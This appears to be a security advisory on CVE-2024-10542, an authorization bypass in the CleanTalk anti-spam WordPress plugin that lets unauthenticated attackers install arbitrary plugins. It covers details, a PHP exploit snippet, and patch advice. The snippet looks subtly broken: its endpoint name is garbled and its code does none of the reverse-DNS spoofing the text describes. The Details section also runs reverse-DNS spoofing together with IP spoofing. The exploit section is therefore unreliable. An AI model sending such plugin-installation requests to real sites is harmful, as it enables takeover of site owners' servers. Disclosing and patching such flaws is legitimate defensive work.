CVE-2024-10542 - Unauthorized Arbitrary Plugin Installation Vulnerability in Spam Protection, Anti-Spam, FireWall by CleanTalk Plugin for WordPress

--
The Spam protection, Anti-Spam, FireWall by CleanTalk plugin for WordPress, a popular plugin for protecting WordPress websites from spam, is found to be vulnerable to unauthorized Arbitrary Plugin Installation. The vulnerability exists in all versions up to, and including, 6.43.2. The issue occurs due to an authorization bypass via reverse DNS spoofing on the checkWithoutToken function, allowing unauthenticated attackers to install and activate arbitrary plugins. This can be further exploited to achieve remote code execution by leveraging another vulnerable plugin that is installed and activated.

Details

--
The vulnerability lies within the checkWithoutToken function in the CleanTalk plugin's cleantalk-spam-protect.php file. This function checks if the incoming request is from a known IP address belonging to the CleanTalk service using reverse DNS. However, an attacker can spoof their IP address to make it appear as if it belongs to the CleanTalk service and bypass the authorization check.

Exploit

--
An attacker can exploit this vulnerability by sending a crafted HTTP POST request to the CleanTalk plugin endpoints for plugin installation with the spoofed reverse DNS. The following code snippet demonstrates how to achieve this using PHP:

<?php
// Craft a HTTP POST request to the plugin installation endpoint
$url = 'https://example.com/wp-admin/admin-ajax.php?action=ct**_referer_check';

$post_data = [
    'plugin_slug' => 'arbitrary-plugin-slug',
    'install_method' => 'install_activation',
    'plugin_path' => 'arbitrary-plugin-path/arbitrary-plugin-file.php'
];

$context = stream_context_create([
    'http' => [
        'method' => 'POST',
        'header' => 'Content-Type: application/x-www-form-urlencoded',
        'content' => http_build_query($post_data)
    ]
]);

// Send the request
$response = file_get_contents($url, false, $context);
?>

Mitigation

--
The developers of the Spam protection, Anti-Spam, FireWall by CleanTalk plugin have released a patch as of version 6.43.3 to fix this vulnerability. It is strongly recommended to update the plugin to the latest version as soon as possible. In addition, it is essential to ensure that all other plugins on the WordPress site are also updated and secured to prevent any potential exploitation.

Original References

--
1. CleanTalk Plugin: https://wordpress.org/plugins/cleantalk-spam-protect/
2. CVE-2024-10542: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-10542
3. CleanTalk Plugin Changelog: https://cleantalk.org/publicoffer#changelog

Conclusion

--
The unauthorized Arbitrary Plugin Installation vulnerability (CVE-2024-10542) in the Spam protection, Anti-Spam, FireWall by CleanTalk plugin for WordPress poses a significant risk to users. Attackers can exploit this vulnerability to install and activate arbitrary plugins, potentially gaining remote code execution capabilities. Users are strongly advised to update their CleanTalk plugin to the latest version and ensure all other plugins on their WordPress site are secure.

Timeline

Published on: 11/26/2024 06:15:07 UTC